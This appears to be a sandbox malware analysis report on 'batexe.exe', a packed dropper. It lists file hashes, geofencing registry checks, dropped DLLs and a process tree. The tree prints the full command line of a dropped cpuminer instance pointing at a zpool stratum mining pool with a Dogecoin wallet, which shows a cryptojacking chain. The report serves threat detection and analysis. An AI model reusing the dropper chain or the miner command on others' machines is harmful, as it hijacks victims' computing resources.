73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
298s
max time network
302s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 05:41

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	b2e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3336304223-2978740688-3645194410-1000\Control Panel\International\Geo\Nation	batexe.exe

Executes dropped EXE 2 IoCs

pid	Process
3652	b2e.exe
848	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
848	cpuminer-sse2.exe
848	cpuminer-sse2.exe
848	cpuminer-sse2.exe
848	cpuminer-sse2.exe
848	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3020-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3020 wrote to memory of 3652	3020	batexe.exe	84
PID 3020 wrote to memory of 3652	3020	batexe.exe	84
PID 3020 wrote to memory of 3652	3020	batexe.exe	84
PID 3652 wrote to memory of 4080	3652	b2e.exe	85
PID 3652 wrote to memory of 4080	3652	b2e.exe	85
PID 3652 wrote to memory of 4080	3652	b2e.exe	85
PID 4080 wrote to memory of 848	4080	cmd.exe	88
PID 4080 wrote to memory of 848	4080	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3020
- C:\Users\Admin\AppData\Local\Temp\8C04.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8C04.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8C04.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9606.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4080
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8C04.tmp\b2e.exe

Filesize
2.1MB

MD5
dd38e65dbf73932b33be566551ca6f18

SHA1
84d4d51ea7b1b6b772b4cc7e9dd809e4cab3a005

SHA256
15d47c5c68216a80e64b47911304a3c02cb37ee7826575806b56c403dcf8efaa

SHA512
d05447f288176c3ebd235cf9ab116474a7de921632ff161535947c879e5a83e1d368cc771c27010437f5205ee130f36690fe4e3908ca9093e9435f9e42b65955

Download Submit
C:\Users\Admin\AppData\Local\Temp\8C04.tmp\b2e.exe

Filesize
2.0MB

MD5
fdeff16ca964a2e9a2203979adac8aef

SHA1
63fd594b64440d14c8bbb531f900073ca93d6f24

SHA256
ec3b54b18cd56dc7a31df8ba96620e24f6ba98f305481e310b7f159ce544f7c7

SHA512
e892709e7c3ff823345cdbde2b4be9f51b3769456baed5ab824bda5ae849dbcff8c2a5750c7db79baa9636eda2542df5df5421b6e8629c827fa4db1abc188e92

Download Submit
C:\Users\Admin\AppData\Local\Temp\8C04.tmp\b2e.exe

Filesize
3.6MB

MD5
7c3ffee6104649ac238f0afaaf0fc95c

SHA1
d31361d259bdb3858dc2cac4d09a01e08c72b557

SHA256
d1c7e4b3531a102e0cc7dd372f0c274aca3f45b49172757bd589837783c9378b

SHA512
1f234746e6445cf6c08b0377f931c2f69a86468ace514686ae43040b5ee320195d1e15d2a4f927094101ebcd958c7a86419fffdcb897a9863eb6196786cfe569

Download Submit
C:\Users\Admin\AppData\Local\Temp\9606.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.1MB

MD5
ec267774165cab63e57e1e00eb0d282a

SHA1
7940ef0b5515e5cfc1f9ded55c4fab98395dfb2b

SHA256
8b23c18e1a8cf04789f1dd1cb5dd928febf66d191b77ac7e239f2937f7e74f64

SHA512
18e6c69932d20c1065433ce6a3259cd171cdf1052c24ae2473ac46b0010b9b8336f1307bdd3510224985c30d6ebba4b3f0de7bf1976c54f6f26c383635f7046f

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
914KB

MD5
63bfa0e0c65c0d991841953c62c3551d

SHA1
b94ce139ba66cada4702fcf7888327d1cf483d55

SHA256
4ba63d1b40df2043514c78974233989d7c50385389c94eb1bb9c63457fb5ac60

SHA512
38a71aa16958fe717cc3110971f9fee24f7c691a9598b0ebadffc1096fa7ba53d2bd61e3d706e42bd7251cd056007cc48c4b182c0bfa3cdaa88e890b77e737fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
764KB

MD5
077b01977f49f31dde58dee7c93ebb83

SHA1
daefb66c0c9a6408dd945f98c809eaf66c6630fd

SHA256
6dc9292f81339df258f9788059bae4e28bb6f4f7c0e8c8cd6f9e8b0209540865

SHA512
fd7bed803273bf2fa687b099413676e30657c6013d12cab6f52bfdfbc42dcc61d9f2829dbbf2093a516a87a9462c99ff001e0482914e23963bab3a40782c7767

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
f95928aa29b542a9d594d9abed41ac24

SHA1
0f58c97a664f807c26984c8fbaec575f1526e7a6

SHA256
a267b5eaa3647de375fe525e7e5d09d8e528951b7695fc0307de7e0dbd275781

SHA512
8f28c5eba6bab9d2c56ca0e234c73fae7ed370e9001e93ef3de7bb3ff556d02d0627f59616232d6022b801555b32f4913ead95756581dbacccaaf301431d4b18

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
1.0MB

MD5
faf729dd3028dc5334848ae64e7c4389

SHA1
67d16170fabbc4f255111d3ddf60a15f44d81025

SHA256
f7cb2ef88593a50c7996eb52b1a9fed43b26c8c685e600c5053800aef666e670

SHA512
b128f568765ad8dfea475d80d9d93743b11b16a4a3100cd3b74f721374fe0adc29b6767d200756bbbacbca5a29759e94014e149113eb961401bec763da341787

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
756KB

MD5
1f286938b0c66dbbe5820e3ded35b0ec

SHA1
8c3f006fc3c5a809f38b8817a693b55d104f936b

SHA256
8716d936ef4637e349566ef72464214a43940ef0dbbcf151f5fcab1440db2997

SHA512
831ff369612cde19355a2b946796fb8ad1cf395e0eb420c01e60e6ca42b54cd33c79f17044e44f264a74f5b073853350f40c56b624be29958f431915bb4721eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
901KB

MD5
4be17b262a648f73a4c5754bf95f3fdc

SHA1
b3418dfb969554723164d820e8b712447ff2997d

SHA256
b38ff75ccac5abde94d622623f8bd7eaa623980de3f679a90a06a6a1eff7bfaa

SHA512
c119c3e326fe674805b9a663371940083dbb8e08bf81b41a452c6a33c1bf415780f75d782ec3402b6131dbc2af6cac1ee2d313875cc2db07543ed903f1d55f53

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/848-46-0x0000000073260000-0x00000000732F8000-memory.dmp

Filesize
608KB

Download
memory/848-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/848-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/848-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/848-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/848-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/848-47-0x0000000001130000-0x00000000029E5000-memory.dmp

Filesize
24.7MB

Download
memory/848-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/848-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/848-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/848-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/848-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/848-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3020-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3652-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3652-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download